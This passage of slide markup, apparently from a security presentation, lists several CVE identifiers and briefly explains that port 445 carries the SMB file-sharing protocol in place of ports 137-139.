              </a:rPr>
              <a:t>CVE-2007-5580</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>CVE-2007-3923</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>CVE-2002-0597</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>CVE-2002-0283</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> Port 445 is a critical vulnerability due to replacing the trio ports 137-139 as the preferred port for Windows FileSharing and numerous other services. Port 445 is used for SMB protocol (server message block) for sharing file between different operating system i.e. windows-windows, Unix-Unix and Unix-windows.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